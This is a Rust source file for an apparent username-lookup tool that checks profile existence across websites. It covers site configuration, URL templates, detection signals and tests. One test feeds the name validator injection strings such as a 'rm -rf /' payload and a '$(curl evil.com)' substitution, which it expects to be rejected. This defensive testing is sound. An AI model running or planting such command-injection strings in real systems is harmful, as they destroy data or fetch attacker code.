use std::fmt;
use serde::{Deserialize, Serialize};
use crate::check::MatchKind;
use crate::error::{Error, Result};
use crate::username::Username;
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Site {
pub name: String,
pub url: UrlTemplate,
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub signals: Vec<Signal>,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub known_present: Option<KnownPresent>,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub known_absent: Option<String>,
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub extract: Vec<Extractor>,
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub tags: Vec<String>,
#[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
pub request_headers: std::collections::BTreeMap<String, String>,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub regex_check: Option<String>,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub engine: Option<String>,
}
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[non_exhaustive]
pub struct Engine {
#[serde(default, skip_serializing_if = "Vec::is_empty")]
pub signals: Vec<Signal>,
#[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
pub request_headers: std::collections::BTreeMap<String, String>,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub regex_check: Option<String>,
}
impl Engine {
pub fn validate(&self, name: &str) -> Result<()> {
if name.trim().is_empty() {
return Err(Error::InvalidSite {
reason: "engine name is empty".into(),
});
}
for signal in &self.signals {
signal.validate().map_err(|reason| Error::InvalidSite {
reason: format!("engine {name:?}: {reason}"),
})?;
}
if let Some(pat) = &self.regex_check {
if let Err(err) = regex::Regex::new(pat) {
tracing::warn!(
engine = %name, pattern = %pat, error = %err,
"engine regex_check did not compile; gate disabled for inheriting sites",
);
}
}
Ok(())
}
pub fn merge_into(&self, site: &mut Site) {
if site.signals.is_empty() {
site.signals.clone_from(&self.signals);
}
for (k, v) in &self.request_headers {
site.request_headers
.entry(k.clone())
.or_insert_with(|| v.clone());
}
if site.regex_check.is_none() {
site.regex_check.clone_from(&self.regex_check);
}
}
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
#[non_exhaustive]
pub enum KnownPresent {
Single(String),
Multiple(Vec<String>),
}
impl KnownPresent {
pub fn as_slice(&self) -> &[String] {
match self {
Self::Single(s) => std::slice::from_ref(s),
Self::Multiple(v) => v.as_slice(),
}
}
pub fn primary(&self) -> Option<&str> {
self.as_slice().first().map(String::as_str)
}
}
impl From<&str> for KnownPresent {
fn from(s: &str) -> Self {
Self::Single(s.to_owned())
}
}
impl From<String> for KnownPresent {
fn from(s: String) -> Self {
Self::Single(s)
}
}
const NAME_MAX_LEN: usize = 80;
fn is_safe_site_name(name: &str) -> bool {
let mut chars = name.chars();
match chars.next() {
Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
_ => return false,
}
chars.all(|c| {
c.is_ascii_alphanumeric()
|| c == '_'
|| c == ' '
|| matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
})
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Extractor {
pub field: String,
pub selector: String,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub attr: Option<String>,
}
impl Site {
pub fn url_for(&self, username: &Username) -> String {
self.url.substitute(username.as_str())
}
pub fn validate(&self) -> Result<()> {
if self.name.trim().is_empty() {
return Err(Error::InvalidSite {
reason: "site name is empty".into(),
});
}
if self.name.len() > NAME_MAX_LEN {
return Err(Error::InvalidSite {
reason: format!(
"site name longer than {NAME_MAX_LEN} chars: {:?}",
self.name
),
});
}
if !is_safe_site_name(&self.name) {
return Err(Error::InvalidSite {
reason: format!(
"site name {:?} contains characters outside the allowed \
set (word chars, space, `.()!/+-`)",
self.name
),
});
}
if self.signals.is_empty() {
return Err(Error::InvalidSite {
reason: format!("site {:?}: signals list is empty", self.name),
});
}
for signal in &self.signals {
signal.validate().map_err(|reason| Error::InvalidSite {
reason: format!("site {:?}: {reason}", self.name),
})?;
}
for extractor in &self.extract {
if extractor.field.trim().is_empty() {
return Err(Error::InvalidSite {
reason: format!("site {:?}: extractor has an empty field name", self.name),
});
}
if scraper::Selector::parse(&extractor.selector).is_err() {
return Err(Error::InvalidSite {
reason: format!(
"site {:?}: invalid CSS selector {:?} for field {:?}",
self.name, extractor.selector, extractor.field
),
});
}
}
if let Some(pat) = &self.regex_check {
if let Err(err) = regex::Regex::new(pat) {
tracing::warn!(
site = %self.name, pattern = %pat, error = %err,
"regex_check did not compile; username-gate disabled for this site",
);
}
}
if let Some(kp) = &self.known_present {
if kp.as_slice().is_empty() {
return Err(Error::InvalidSite {
reason: format!("site {:?}: known_present is an empty list", self.name),
});
}
for name in kp.as_slice() {
if name.trim().is_empty() {
return Err(Error::InvalidSite {
reason: format!(
"site {:?}: known_present contains an empty username",
self.name
),
});
}
}
}
for tag in &self.tags {
if tag.trim().is_empty() {
return Err(Error::InvalidSite {
reason: format!("site {:?}: tag is empty", self.name),
});
}
}
Ok(())
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);
const PLACEHOLDER: &str = "{username}";
impl UrlTemplate {
pub fn new(template: impl Into<String>) -> Result<Self> {
let t = template.into();
if !t.contains(PLACEHOLDER) {
return Err(Error::InvalidSite {
reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
});
}
if !(t.starts_with("http://") || t.starts_with("https://")) {
return Err(Error::InvalidSite {
reason: format!("url template must start with http(s)://: {t:?}"),
});
}
Ok(Self(t))
}
fn substitute(&self, username: &str) -> String {
self.0.replace(PLACEHOLDER, username)
}
pub fn as_str(&self) -> &str {
&self.0
}
}
impl fmt::Display for UrlTemplate {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.write_str(&self.0)
}
}
impl Serialize for UrlTemplate {
fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
self.0.serialize(s)
}
}
impl<'de> Deserialize<'de> for UrlTemplate {
fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
let raw = String::deserialize(d)?;
Self::new(raw).map_err(serde::de::Error::custom)
}
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "kind", rename_all = "snake_case")]
#[non_exhaustive]
pub enum Signal {
StatusFound {
codes: Vec<u16>,
},
StatusNotFound {
codes: Vec<u16>,
},
BodyPresent {
text: String,
},
BodyAbsent {
text: String,
},
RedirectAbsent {
fragment: String,
},
}
#[derive(Debug)]
pub(crate) struct Probe<'a> {
pub(crate) status: u16,
pub(crate) final_url: &'a str,
pub(crate) body: &'a str,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
Found,
NotFound,
Ambiguous,
}
impl Signal {
pub(crate) fn needs_body(&self) -> bool {
matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
}
pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
match self {
Self::StatusFound { codes } => {
if codes.contains(&probe.status) {
SignalVerdict::Found
} else {
SignalVerdict::Ambiguous
}
}
Self::StatusNotFound { codes } => {
if codes.contains(&probe.status) {
SignalVerdict::NotFound
} else {
SignalVerdict::Ambiguous
}
}
Self::BodyPresent { text } => {
if probe.body.contains(text.as_str()) {
SignalVerdict::Found
} else {
SignalVerdict::Ambiguous
}
}
Self::BodyAbsent { text } => {
if probe.body.contains(text.as_str()) {
SignalVerdict::NotFound
} else {
SignalVerdict::Ambiguous
}
}
Self::RedirectAbsent { fragment } => {
if probe.final_url.contains(fragment.as_str()) {
SignalVerdict::NotFound
} else {
SignalVerdict::Ambiguous
}
}
}
}
pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
match self {
Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
Self::RedirectAbsent { fragment } => {
format!("final URL contains {fragment:?} (redirect_absent)")
}
}
}
fn validate(&self) -> std::result::Result<(), String> {
match self {
Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
if codes.is_empty() {
return Err("status signal codes list is empty".into());
}
}
Self::BodyPresent { text } | Self::BodyAbsent { text } => {
if text.is_empty() {
return Err("body signal text is empty".into());
}
}
Self::RedirectAbsent { fragment } => {
if fragment.is_empty() {
return Err("redirect signal fragment is empty".into());
}
}
}
Ok(())
}
}
pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
where
I: IntoIterator<Item = SignalVerdict>,
{
let mut found = false;
let mut not_found = false;
for v in verdicts {
match v {
SignalVerdict::Found => found = true,
SignalVerdict::NotFound => not_found = true,
SignalVerdict::Ambiguous => {}
}
}
if not_found {
MatchKind::NotFound
} else if found {
MatchKind::Found
} else {
MatchKind::Uncertain
}
}
#[cfg(test)]
mod tests {
use super::*;
fn site_with(signals: Vec<Signal>) -> Site {
Site {
name: "Example".into(),
url: UrlTemplate::new("https://example.com/{username}").unwrap(),
signals,
known_present: None,
known_absent: None,
extract: Vec::new(),
tags: Vec::new(),
request_headers: std::collections::BTreeMap::new(),
regex_check: None,
engine: None,
}
}
#[test]
fn url_template_substitutes_placeholder() {
let user = Username::new("alice").unwrap();
let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
assert_eq!(site.url_for(&user), "https://example.com/alice");
}
#[test]
fn url_template_rejects_missing_placeholder() {
assert!(UrlTemplate::new("https://example.com/users/").is_err());
}
#[test]
fn url_template_rejects_bad_scheme() {
assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
}
#[test]
fn validate_requires_non_empty_signals() {
let err = site_with(vec![]).validate().unwrap_err();
assert!(err.to_string().contains("signals list is empty"));
}
#[test]
fn validate_rejects_empty_status_codes() {
let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
.validate()
.unwrap_err();
assert!(err.to_string().contains("status signal"));
}
#[test]
fn validate_rejects_empty_body_text() {
let err = site_with(vec![Signal::BodyAbsent {
text: String::new(),
}])
.validate()
.unwrap_err();
assert!(err.to_string().contains("body signal"));
}
#[test]
fn validate_rejects_empty_redirect_fragment() {
let err = site_with(vec![Signal::RedirectAbsent {
fragment: String::new(),
}])
.validate()
.unwrap_err();
assert!(err.to_string().contains("redirect signal"));
}
#[test]
fn validate_rejects_shell_metacharacters_in_name() {
for bad in [
"Foo\"; rm -rf /; #",
"Bar$(curl evil.com)",
"Baz`whoami`",
"Qux\\nfoo",
"back\\slash",
"pipe|ish",
"semi;colon",
"amp&and",
"lt<gt>",
] {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.name = bad.into();
let err = s.validate().unwrap_err();
assert!(
err.to_string()
.contains("characters outside the allowed set"),
"expected unsafe-name rejection for {bad:?}, got {err}",
);
}
}
#[test]
fn validate_accepts_real_world_site_names() {
for ok in [
"GitHub",
"Steam Community (User)",
"X / Twitter",
"osu!",
"Eintracht Frankfurt Forum",
"Archive of Our Own",
"Career.habr",
"fl",
"GitLab.com",
"Sbazar.cz",
] {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.name = ok.into();
assert!(s.validate().is_ok(), "expected {ok:?} to validate");
}
}
#[test]
fn validate_rejects_overlong_name() {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.name = "A".repeat(100);
let err = s.validate().unwrap_err();
assert!(err.to_string().contains("longer than"));
}
#[test]
fn validate_accepts_well_formed_regex_check() {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
assert!(s.validate().is_ok());
}
#[test]
fn validate_tolerates_unsupported_regex_features() {
let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
assert!(
s.validate().is_ok(),
"lookaround-bearing regex should warn, not reject the site"
);
}
#[test]
fn signal_status_found_votes_only_on_match() {
let signal = Signal::StatusFound { codes: vec![200] };
let probe = Probe {
status: 200,
final_url: "https://example.com/alice",
body: "",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
let probe = Probe {
status: 404,
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
#[test]
fn signal_status_not_found_votes_only_on_match() {
let signal = Signal::StatusNotFound { codes: vec![404] };
let probe = Probe {
status: 404,
final_url: "",
body: "",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
let probe = Probe {
status: 200,
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
#[test]
fn signal_body_absent_votes_not_found_when_text_present() {
let signal = Signal::BodyAbsent {
text: "Profile not found".into(),
};
let probe = Probe {
status: 200,
final_url: "",
body: "<h1>Profile not found</h1>",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
let probe = Probe {
body: "<h1>Welcome alice</h1>",
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
#[test]
fn signal_redirect_absent_inspects_final_url() {
let signal = Signal::RedirectAbsent {
fragment: "/login".into(),
};
let probe = Probe {
status: 200,
final_url: "https://example.com/login?next=/alice",
body: "",
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
let probe = Probe {
final_url: "https://example.com/alice",
..probe
};
assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
}
#[test]
fn aggregate_found_when_only_found_signals_fire() {
let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
assert_eq!(kind, MatchKind::Found);
}
#[test]
fn aggregate_not_found_when_only_not_found_signals_fire() {
let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
assert_eq!(kind, MatchKind::NotFound);
}
#[test]
fn aggregate_not_found_wins_over_found() {
let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
assert_eq!(kind, MatchKind::NotFound);
}
#[test]
fn aggregate_uncertain_when_no_signals_fire() {
let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
assert_eq!(kind, MatchKind::Uncertain);
}
#[test]
fn aggregate_empty_is_uncertain() {
let kind = aggregate(std::iter::empty());
assert_eq!(kind, MatchKind::Uncertain);
}
#[test]
fn needs_body_is_true_only_for_body_signals() {
assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
assert!(
!Signal::RedirectAbsent {
fragment: "/login".into()
}
.needs_body()
);
assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
}
#[test]
fn deserializes_signal_list() {
let json = r#"{
"name": "GitHub",
"url": "https://github.com/{username}",
"signals": [
{ "kind": "status_found", "codes": [200] },
{ "kind": "status_not_found", "codes": [404] }
]
}"#;
let site: Site = serde_json::from_str(json).unwrap();
assert_eq!(site.name, "GitHub");
assert_eq!(site.signals.len(), 2);
site.validate().unwrap();
}
proptest::proptest! {
#[test]
fn aggregate_matches_negative_priority_spec(
votes in proptest::collection::vec(
proptest::prop_oneof![
proptest::strategy::Just(SignalVerdict::Found),
proptest::strategy::Just(SignalVerdict::NotFound),
proptest::strategy::Just(SignalVerdict::Ambiguous),
],
0..16,
),
) {
let kind = aggregate(votes.iter().copied());
let expected = if votes.contains(&SignalVerdict::NotFound) {
MatchKind::NotFound
} else if votes.contains(&SignalVerdict::Found) {
MatchKind::Found
} else {
MatchKind::Uncertain
};
proptest::prop_assert_eq!(kind, expected);
}
}
}